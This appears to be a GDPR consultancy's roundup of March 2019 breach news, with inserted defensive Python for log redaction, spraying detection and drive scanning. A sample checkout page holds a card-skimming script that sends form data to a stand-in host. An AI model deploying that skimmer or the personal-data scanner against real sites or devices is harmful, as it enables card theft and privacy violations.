GDPR Services: 29 stories worth reading from March 2019
Here, from our GDPR Services, are the 29 most newsworthy cases and odd happenings worldwide that were identified and publicly reported during March 2019. Because personal data breaches have a severe negative impact on any business and serious legal consequences, consider a one-off implementation package (on-demand GDPR COMPLIANCE) or a recurring monthly service (GDPR COMPLIANCE ADD-ON) together with your dedicated data protection OFFICER package.
- Here are 20 questions you need to ask to assess your privacy readiness.
- They include where you get your data, where you can find it, and whether you can delete it. Basic, but helpful. Twenty Questions To Help You On Your Privacy Readiness Journey
- A massive survey of thousands of Internet users around the world found that they have taken steps to protect their online data.
- Contrary to popular belief, Millennials do care about online privacy. Gen Z, however, are the most likely not to update their software. Labs survey finds privacy concerns, distrust of social media rampant with all age groups
- A security researcher collected used PCs from local pawn shops and found a staggering amount of personal data on their hard drives.
- For $600, he obtained dozens of computers, cell phones and hard disks. He ran each drive through his own scanning tool and found dozens of SSNs, email accounts, credit card numbers and even two passports. It’s Scary How Much Personal Data People Leave on Used Laptops and Phones, Researcher Finds
- The US agency FEMA has accidentally leaked the personal data of more than 2 million disaster survivors from its third-party contractor.
- This is according to an OIG report released last week. The contractor has since updated its access rules, and the report says no evidence of compromise has yet been found. FEMA ‘unnecessarily’ shared data of 2.3 million disaster victims with contractor
- This post takes a deep dive into what happened with the Marriott/Starwood breach from 2014-2018.
- Nearly 400 million guests’ private data was leaked, costing the hotel chain $3M. The chain had poor security practices and worse response tactics. Autopsying the Marriott Data Breach: This is why insurance matters
- A very sensitive data leak from a spyware vendor has been available online for more than six weeks.
- The leak contained images and audio recordings from consumers’ phones. Troy Hunt examined the nearly 20GB of data to verify it is legit. Reporters have been unsuccessful with various attempts to contact the vendor, and are not naming the vendor to try to protect the data. This Spyware Data Leak Is So Bad We Can’t Even Tell You About It
- US Immigration and Customs Enforcement (ICE) is targeting immigrants by tracking their vehicle license plates and matching them against the cars’ location data.
- The ACLU obtained the documents through a FOIA request. Worse, 80 local law enforcement agencies now share license plate locations with the feds. Documents Reveal ICE Using Driver Location Data From Local Police for Deportations
- Brian Krebs broke this story about how, for several years, thousands of Facebook employees had access to hundreds of millions of users’ plaintext passwords.
- Soon thereafter, a Facebook VP posted this explanation that said there is no evidence that anyone abused or improperly accessed this information. That is a different statement from saying that no one accessed them. There was also no explanation of why this data, which was contained in log files, was collected to begin with. My colleague Sean Gallagher in Ars has the best analysis. Facebook Stored Hundreds of Millions of User Passwords in Plain Text for Years and Keeping FaceBook Passwords Secure and Facebook apps logged users’ passwords in plaintext, because why not
- Medical supplier Zoll suffered a breach of its email hosted on a third-party site.
- It is offering free credit monitoring, but doesn’t believe any data was compromised. ZOLL Reports Recent Data Security Incident
- A majority of official EU government websites contain third-party ad tracking cookies.
- This runs counter to the GDPR and comes from this report. French government websites are the worst offenders, with more than 50 different trackers found. Cookiebot report: Hidden tracking of citizens on EU government and health sector websites
- MyPillow and Amerisleep were both hit by Magecart card-skimming attacks.
- The first attack ran for two months last fall and was acknowledged by the company. The second is still ongoing. Neither company informed customers about the breach. Magecart has been responsible for other recent attacks, including on UK-based sneaker company Fila and several American e-commerce sites, according to this report. Its attraction is simple deployment: a single line of injected JavaScript. Consumers May Lose Sleep Over These Two New Magecart Breaches and Criminals Use One Line of Code to Steal Card Data from E-Commerce Sites
- Here is a depressing article about why phishing is so potent.
- Even among a team of tech-savvy developers, a third of the recipients were fooled by a cleverly designed phish into clicking the embedded link, and 14 percent of them went on to submit personal data. This post shows the importance of security awareness training. Phishing my company. An infosec lesson for businesses
- Bruce Schneier has a long list of suggested privacy improvements for Facebook.
- Now if only Zuck were really serious about doing any of them. They include more usable privacy options, more anti-stalking protection, better transparency, an end to enforcing real names on accounts and lots more. Judging Facebook’s Privacy Shift
- The Pakistani passport office website has been hit by an attack similar to last month’s attack on the Bangladeshi embassy in Cairo.
- The compromised site loads Scanbox, a browser-based data stealer and keystroke logger, and uses similar obfuscation techniques to avoid detection. Attacker Tracking Users Seeking Pakistani Passport
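The used-laptop item above says the researcher ran each drive through his own scanning tool. That tool is not on this page; what follows is an added example, not the researcher's code, of how such a scan works: a raw device is read in fixed-size chunks, each chunk is searched for SSN-shaped strings, Luhn-valid card numbers and e-mail addresses, and an overlap between chunks keeps a hit that straddles a chunk boundary from being missed or double-counted. The sample bytes, patterns and thresholds are constructed for the example.

```python
import re
from typing import Iterable, Iterator

# Patterns for the kinds of records the researcher reported finding. Constructed for this
# example; extend them for the identifiers and formats relevant to your data.
SSN_RE = re.compile(rb"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")
CARD_RE = re.compile(rb"\b(?:\d[ -]?){12,18}\d\b")
EMAIL_RE = re.compile(rb"\b[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}\.[A-Za-z]{2,24}\b")

CHUNK_SIZE = 1 << 20   # read a raw device 1 MiB at a time
OVERLAP = 512          # must exceed the longest possible match so boundary-spanning hits survive


def luhn_ok(digits: str) -> bool:
    """Luhn checksum; drops most digit runs that merely look like card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def scan_bytes(buf: bytes) -> list[tuple[int, int, str, str]]:
    """Return (start, end, kind, value) for every candidate in one buffer."""
    hits = []
    for m in SSN_RE.finditer(buf):
        hits.append((m.start(), m.end(), "ssn", m.group().decode("ascii")))
    for m in CARD_RE.finditer(buf):
        digits = re.sub(r"\D", "", m.group().decode("ascii"))
        if luhn_ok(digits):
            hits.append((m.start(), m.end(), "card", digits))
    for m in EMAIL_RE.finditer(buf):
        hits.append((m.start(), m.end(), "email", m.group().decode("ascii")))
    return hits


def scan_stream(chunks: Iterable[bytes]) -> list[tuple[int, str, str]]:
    """Scan a chunked byte stream and return sorted (absolute offset, kind, value) findings.
    Each buffer is the previous buffer's last OVERLAP bytes plus the new chunk, so a match cut
    by a chunk boundary is seen whole in the next pass. A match touching a buffer edge is
    skipped in that pass because it may be truncated; the neighbouring pass sees it whole."""
    findings: dict[tuple[int, str], str] = {}
    tail = b""
    offset = 0                      # absolute offset of the current chunk
    it: Iterator[bytes] = iter(chunks)
    chunk = next(it, None)
    while chunk is not None:
        nxt = next(it, None)
        buf = tail + chunk
        base = offset - len(tail)   # absolute offset of buf[0]
        for start, end, kind, value in scan_bytes(buf):
            if start == 0 and base > 0:              # possibly cut on the left
                continue
            if end == len(buf) and nxt is not None:  # possibly cut on the right
                continue
            findings[(base + start, kind)] = value   # same offset+kind seen twice: one entry
        tail = buf[-OVERLAP:]
        offset += len(chunk)
        chunk = nxt
    return sorted((off, kind, value) for (off, kind), value in findings.items())


# Constructed stand-in for the contents of a recovered drive; a real run reads the device.
SAMPLE_IMAGE = (
    b"customer file\r\nname=Jane Doe\r\nssn=219-09-9999\r\n"
    b"card=4111 1111 1111 1111 exp=12/21\r\n"
    b"junk 1234567890123456 not a card\r\n"
    b"contact jane.doe@example.com\r\n"
)


def demo_findings(chunk_size: int = 7) -> list[tuple[int, str, str]]:
    """Scan SAMPLE_IMAGE in deliberately tiny chunks to exercise the boundary handling."""
    return scan_stream(SAMPLE_IMAGE[i:i + chunk_size]
                       for i in range(0, len(SAMPLE_IMAGE), chunk_size))


if __name__ == "__main__":
    for off, kind, value in demo_findings():
        print(f"offset {off:>8}: {kind:5} {value}")
    # Against a real device (read-only): scan_stream(iter(lambda: dev.read(CHUNK_SIZE), b""))
```

The 16-digit run labelled "junk" fails the Luhn check and is dropped, which is what keeps a scan like this from drowning in false positives on timestamps and serial numbers.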
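On the Facebook item: the passwords ended up in log files because request data was written out verbatim. As an added example (not Facebook's code and not from the linked articles), here is that anti-pattern beside the fixes in Python: redacting sensitive keys before serialising, a logging.Filter that enforces the redaction centrally for every record so no call site can forget, and a reviewer that scans existing log lines for credential fields that were not redacted. The request payload, key list, "[REDACTED]" marker and log lines are constructed.

```python
import json
import logging
import re
from io import StringIO

# Keys whose values must never reach a log line. Constructed list; extend for your schema.
SENSITIVE_KEY_RE = re.compile(
    r"pass(word|wd|phrase)?|pwd|secret|token|authorization|api[_-]?key|cookie|session", re.I)
REDACTED = "[REDACTED]"


def redact(value):
    """Return a copy of a JSON-like structure with values under sensitive keys replaced."""
    if isinstance(value, dict):
        return {k: REDACTED if SENSITIVE_KEY_RE.search(str(k)) else redact(v)
                for k, v in value.items()}
    if isinstance(value, list):
        return [redact(v) for v in value]
    return value


def unsafe_login_log_line(request_body: dict) -> str:
    """The anti-pattern: the client's request body goes to disk verbatim, password included."""
    return "login attempt " + json.dumps(request_body, sort_keys=True)


def safe_login_log_line(request_body: dict) -> str:
    """Same line, with the body passed through redact() first."""
    return "login attempt " + json.dumps(redact(request_body), sort_keys=True)


class RedactingFilter(logging.Filter):
    """Central enforcement: scrub dict/list arguments of every record passing this logger."""

    def filter(self, record: logging.LogRecord) -> bool:
        # logging stores a lone mapping argument as the mapping itself, otherwise a tuple
        if isinstance(record.args, (dict, list)):
            record.args = redact(record.args)
        elif isinstance(record.args, tuple):
            record.args = tuple(redact(a) for a in record.args)
        return True


def emit_through_filter(payload: dict) -> str:
    """Log a payload via a logger with RedactingFilter installed; return the emitted line."""
    buf = StringIO()
    logger = logging.getLogger("example.login")
    logger.handlers.clear()
    logger.filters.clear()
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = logging.StreamHandler(buf)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    logger.addHandler(handler)
    logger.addFilter(RedactingFilter())
    logger.info("login attempt %s", payload)  # payload stays structured until the filter runs
    handler.flush()
    return buf.getvalue().strip()


# Credential-like key followed by a value, in JSON, form-encoded or Python-repr style.
LEAK_RE = re.compile(
    r"""["']?\b(?P<key>pass(?:word|wd|phrase)?|pwd|secret|token|api[_-]?key)\b["']?"""
    r"""\s*[:=]\s*["']?(?P<value>[^"',\s}&]+)""", re.I)


def find_credential_leaks(lines):
    """Review existing logs: (line number, key) for every credential field left unredacted."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in LEAK_RE.finditer(line):
            if m.group("value") != REDACTED:
                hits.append((n, m.group("key").lower()))
    return hits


SAMPLE_REQUEST = {"user": "jane", "password": "hunter2", "remember": True}  # constructed
SAMPLE_LOG_LINES = [  # constructed lines of the kind a log review turns up
    '2019-03-21T10:00:01Z INFO login attempt {"user": "jane", "password": "hunter2"}',
    '2019-03-21T10:00:02Z INFO POST /login body=user=bob&password=letmein&remember=1',
    '2019-03-21T10:00:03Z INFO login attempt {"user": "eve", "password": "[REDACTED]"}',
    '2019-03-21T10:00:04Z INFO GET /profile user=carol',
]

if __name__ == "__main__":
    print(unsafe_login_log_line(SAMPLE_REQUEST))
    print(safe_login_log_line(SAMPLE_REQUEST))
    print(emit_through_filter(SAMPLE_REQUEST))
    print(find_credential_leaks(SAMPLE_LOG_LINES))
```

The filter is the part worth copying: redacting at each call site is exactly the discipline that breaks down across thousands of developers, while a filter on the logger (or a processor in whatever structured-logging pipeline you use) applies to every record regardless of who wrote the call.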
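The Magecart item notes that a skimmer needs only one injected line of JavaScript. Here is an added example, not from the linked articles, of the check a shop can run against its own checkout page: enumerate every script tag, flag sources outside an allowlist of hosts, flag allowed third-party scripts that carry no Subresource Integrity pin, and flag inline scripts that name an outside host (skimmed card data has to go somewhere). The HTML, hostnames (including the reserved .invalid domain) and known-good script bytes are constructed.

```python
import base64
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts allowed to serve script to the checkout page. Constructed for this example.
ALLOWED_SCRIPT_HOSTS = {"shop.example.com", "static.example.com"}

URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


class ScriptCollector(HTMLParser):
    """Collect every <script>: external ones with their integrity attribute, inline bodies."""

    def __init__(self):
        super().__init__()
        self.external = []   # (src, integrity or None)
        self.inline = []     # inline script bodies
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], a.get("integrity")))
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            self.inline.append("".join(self._buf).strip())


def sri_hash(content: bytes) -> str:
    """Subresource Integrity value to pin a known-good copy of a third-party script."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode("ascii")


def integrity_matches(content: bytes, integrity: str) -> bool:
    """True if the bytes actually served still match the pinned digest."""
    return sri_hash(content) == integrity


def audit_checkout_page(html: str, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (finding, detail) pairs for scripts from hosts outside the allowlist, allowed
    third-party scripts without an integrity pin, and inline scripts naming an outside host."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src, integrity in parser.external:
        host = (urlsplit(src).hostname or "").lower()
        if not host:                       # same-origin path such as /js/app.js
            continue
        if host not in allowed_hosts:
            findings.append(("unexpected-script-host", src))
        elif integrity is None:
            findings.append(("missing-integrity", src))
    for body in parser.inline:
        for host in URL_HOST_RE.findall(body):
            if host.lower() not in allowed_hosts:
                findings.append(("inline-script-contacts", host.lower()))
    return findings


KNOWN_GOOD_CHECKOUT_JS = b'window.checkoutVersion = "1.0";'  # constructed stand-in for the real file

# Constructed checkout page: one pinned script, one unpinned, one injected loader from an
# outside host (the one-line skimmer), and an inline hook that posts the form elsewhere.
SAMPLE_CHECKOUT_HTML = """<!doctype html>
<html><head>
<script src="/js/app.js"></script>
<script src="https://static.example.com/js/checkout.js" integrity="__PIN__"></script>
<script src="https://static.example.com/js/analytics.js"></script>
<script src="https://cdn.checkout-stats.invalid/jquery.min.js"></script>
</head><body>
<form id="payment"><input name="card"><button>Pay</button></form>
<script>
document.getElementById("payment").addEventListener("submit", function () {
  new Image().src = "https://cdn.checkout-stats.invalid/c?d=" +
    btoa(JSON.stringify(Object.fromEntries(new FormData(this))));
});
</script>
</body></html>
""".replace("__PIN__", sri_hash(KNOWN_GOOD_CHECKOUT_JS))

if __name__ == "__main__":
    for finding, detail in audit_checkout_page(SAMPLE_CHECKOUT_HTML):
        print(f"{finding:24} {detail}")
```

Run it on a schedule against the live page and diff the output against a baseline; pair it with a Content-Security-Policy script-src allowlist so that an injected tag from an unknown host is also blocked in the browser rather than only reported, and use the integrity pin to catch the other Magecart variant, where the skimmer is appended to a legitimate script on an allowed host.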
HELPS YOU TO MEET GDPR REGULATIONS
Compliant and sustainable long-term GDPR operational behaviour. Have a rock-solid foundation for privacy procedures and GDPR mandate compliance.
Discover trending and viral stories about GDPR Services worldwide. The remaining private data breaches that made news headlines. All of these happened just in the last month.
- Networks of four major London tourist attractions have been hit with millions of cyber attacks in the past three years.
- The networks targeted were the Natural History Museum, the Imperial War Museum, Kew Gardens and the Tate. None resulted in any compromises of membership data. Millions of cyber attacks on Kew Gardens and museums as hackers target people’s financial data
- Researchers have discovered a critical flaw, described as a backdoor, in the Swiss online voting system.
- It could make it easier for fraudulent ballots to be counted without detection. The finding was disclosed outside the bug bounty program announced last month. Researchers Find Critical Backdoor in Swiss Online Voting System
- This handy reference guide explains the level of privacy available with various security tools, such as VPNs, anonymous browsing sessions, and privacy-enhanced search engines.
- Each is evaluated for what data is divulged, such as DNS, IP address, and server info. Browsing Anonymously: Is It Really Anonymous?
- Two Kiev-based app developers have been sued by Facebook. The social networking company claims they created malicious browser extensions that scraped user data from its platform.
- The apps have been downloaded more than 60,000 times and take the form of a series of online quizzes that were targeted at Russian speakers. Facebook sues Ukrainian browser extension makers for scraping user data
- Another open MongoDB database has been found exposed, this one containing API calls for Dalil, a Saudi caller ID app.
- The app has been downloaded more than five million times, and contains a wealth of private data, including phone numbers, GPS locations and user IDs of numerous other apps. Saudi caller ID Dalil app exposed data of more than 5 million users
- Four MongoDB databases spanning 190 GB and containing two billion records belonging to Verifications.io were found publicly exposed last week.
- They were found by a researcher. Its website was taken offline and hasn’t yet been brought back. Security consultants are at work to determine the cause. Troy Hunt has some ideas how this trove was compiled on Twitter. 800+ Million Emails Leaked Online by Email Verification Service.
- Citrix’ internal network was breached by hackers last week.
- Resecurity (cited in The Hacker News) claims the Iranian-backed Iridium hacker group was responsible. The attackers likely got in by password spraying: trying a small set of common passwords against many accounts, which stays under per-account lockout thresholds, rather than by brute-forcing a single account. Citrix was alerted to the breach by the FBI, which is investigating. The company posted a breach notification but does not yet know what data the hackers accessed. Citrix investigating unauthorized access to internal network and Citrix Data Breach – Iranian Hackers Stole 6TB of Sensitive Data.
- An extensively researched report on the online criminal underworld is now available from Bromium.
- It documents how various players profit from malware, money laundering, scams, and the theft of intellectual property, credit cards and data. The scale of the “cybercrime as a service” world is staggering. Cybercrime has gone from a simple business to an entire “Web of Profit”, which is the name of this report and is worthy of your attention. Into the Web of Profit Landmark research by Dr. Mike McGuire
- Sweet, contradictory irony
- Equifax CEO Mark Begor was asked by a congresswoman to reveal his SSN and birthdate in a public hearing, and wasn’t comfortable doing so. This contradicts what the company’s legal team is saying in a class action lawsuit. video – Rep. Katie Porter asks Equifax CEO to release his Social Security number
- Sports collectable and notable baseball card vendor Topps has been hit with a Magecart formjacking attack.
- The breach notification is posted here: NOTICE OF DATA BREACH. Online customers who made purchases at the end of 2018 may have had personal data, including payment card details, exposed and should monitor their credit card statements.
- This firm has developed the Pwn Index, a score for the price of leaked data from breaches.
- The average price is more than $15,000, and it is increasing. RunSafe Pwn Index
- A new report from 4iQ looks at the past year’s top 12 breaches.
- The six “Collection” dumps took the top spot. For the first time, underground data brokers are actively including citizen data, such as voter data, in their offerings. There is some good news: the number of leaky devices is slowly declining. IDENTITIES IN THE WILD: THE LONG TAIL OF SMALL BREACHES
- A total of 45,000 patients of the Rush Medical System may have had their data compromised in a breach.
- The exposed data may include names, addresses, birthdays, Social Security numbers and health insurance information. Rush Health System Reports Data Breach Affecting 45,000
- A new collection of unsecured MongoDB databases has been found.
- They contain conversations and private data from surveillance of millions of Chinese social media users, including the popular WeChat. Open MongoDB Databases Expose Chinese Surveillance Data
- Qbot is back in the news.
- Researchers have found a new campaign leveraging the banking credential stealer, using polymorphic methods that make detection difficult. It has so far infected more than 2,700 victims around the world. Varonis Exposes Global Cyber Campaign: C2 Server Actively Compromising Thousands of Victims
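The Citrix item above says the FBI pointed to password spraying. The technique matters for detection because per-account lockout thresholds never trip: each account sees only one or two failures. Here is an added example, not part of the Citrix notification or the linked articles, of detection logic over a constructed authentication log (documentation IP ranges): one function finds classic brute force (many failures on one account from one source) and one finds spraying (few failures per account across many accounts from one source); any later success from a spraying source is reported as a likely compromised account. Log format, field names and thresholds are assumptions for the example.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed authentication log. 198.51.100.5 hammers one account (brute force); 192.0.2.10 is
# a user mistyping twice; 203.0.113.7 tries one password across many accounts and gets in once.
SAMPLE_AUTH_LOG = [
    "2019-03-08T01:58:00Z src=198.51.100.5 user=bob result=FAIL",
    "2019-03-08T01:58:01Z src=198.51.100.5 user=bob result=FAIL",
    "2019-03-08T01:58:02Z src=198.51.100.5 user=bob result=FAIL",
    "2019-03-08T01:58:03Z src=198.51.100.5 user=bob result=FAIL",
    "2019-03-08T01:58:04Z src=198.51.100.5 user=bob result=FAIL",
    "2019-03-08T01:58:05Z src=198.51.100.5 user=bob result=FAIL",
    "2019-03-08T01:59:40Z src=192.0.2.10 user=carol result=FAIL",
    "2019-03-08T01:59:50Z src=192.0.2.10 user=carol result=FAIL",
    "2019-03-08T02:00:05Z src=192.0.2.10 user=carol result=OK",
    "2019-03-08T02:00:01Z src=203.0.113.7 user=alice result=FAIL",
    "2019-03-08T02:00:16Z src=203.0.113.7 user=bob result=FAIL",
    "2019-03-08T02:00:31Z src=203.0.113.7 user=carol result=FAIL",
    "2019-03-08T02:00:46Z src=203.0.113.7 user=dave result=FAIL",
    "2019-03-08T02:01:01Z src=203.0.113.7 user=erin result=FAIL",
    "2019-03-08T02:01:16Z src=203.0.113.7 user=frank result=FAIL",
    "2019-03-08T02:01:31Z src=203.0.113.7 user=grace result=FAIL",
    "2019-03-08T02:01:46Z src=203.0.113.7 user=hpatel result=OK",
    "2019-03-08T02:02:01Z src=203.0.113.7 user=ivan result=FAIL",
]


def parse_event(line: str) -> dict:
    """Parse one 'timestamp key=value ...' line (assumed format) into a dict."""
    ts, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "src": fields["src"], "user": fields["user"], "ok": fields["result"] == "OK"}


def detect_brute_force(lines, min_failures=5, window=timedelta(minutes=10)):
    """Classic brute force: many failures against ONE account from one source inside the window."""
    fails = defaultdict(list)
    for e in sorted(map(parse_event, lines), key=lambda e: e["ts"]):
        if not e["ok"]:
            fails[(e["src"], e["user"])].append(e["ts"])
    hits = []
    for key, stamps in fails.items():
        lo = 0
        for hi in range(len(stamps)):          # sliding window over this pair's failures
            while stamps[hi] - stamps[lo] > window:
                lo += 1
            if hi - lo + 1 >= min_failures:
                hits.append(key)
                break
    return hits


def detect_password_spraying(lines, min_accounts=5, max_failures_per_account=2,
                             window=timedelta(minutes=10)):
    """Spraying inverts the pattern: few failures per account, MANY accounts, one source.
    A per-account lockout never trips, so the detection pivots on the source instead."""
    events = sorted(map(parse_event, lines), key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        fails = [e for e in evs if not e["ok"]]
        lo = 0
        for hi in range(len(fails)):
            while fails[hi]["ts"] - fails[lo]["ts"] > window:
                lo += 1
            per_user = Counter(e["user"] for e in fails[lo:hi + 1])
            if len(per_user) >= min_accounts and max(per_user.values()) <= max_failures_per_account:
                start = fails[lo]["ts"]
                alerts.append({
                    "src": src,
                    "start": start,
                    "accounts_tried": len({e["user"] for e in fails if e["ts"] >= start}),
                    # a source that is spraying has no business succeeding: treat any later
                    # success from it as a probable compromised account
                    "likely_compromised": sorted({e["user"] for e in evs if e["ok"] and e["ts"] >= start}),
                })
                break                          # one alert per source is enough
    return alerts


if __name__ == "__main__":
    print("brute force:", detect_brute_force(SAMPLE_AUTH_LOG))
    for a in detect_password_spraying(SAMPLE_AUTH_LOG):
        print(f"spray from {a['src']} starting {a['start']}: {a['accounts_tried']} accounts, "
              f"likely compromised {a['likely_compromised']}")
```

The thresholds are starting points; tune the window and account count to your own authentication volume, and pivot on other source attributes (ASN, user agent, device identifier) when the attacker rotates IP addresses, since spraying from a pool of sources defeats the per-IP grouping shown here.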
data protection OFFICER
Identify high-risk problems. Taking access and rights management into serious consideration is the foundation for a safely guarded online presence throughout your domain.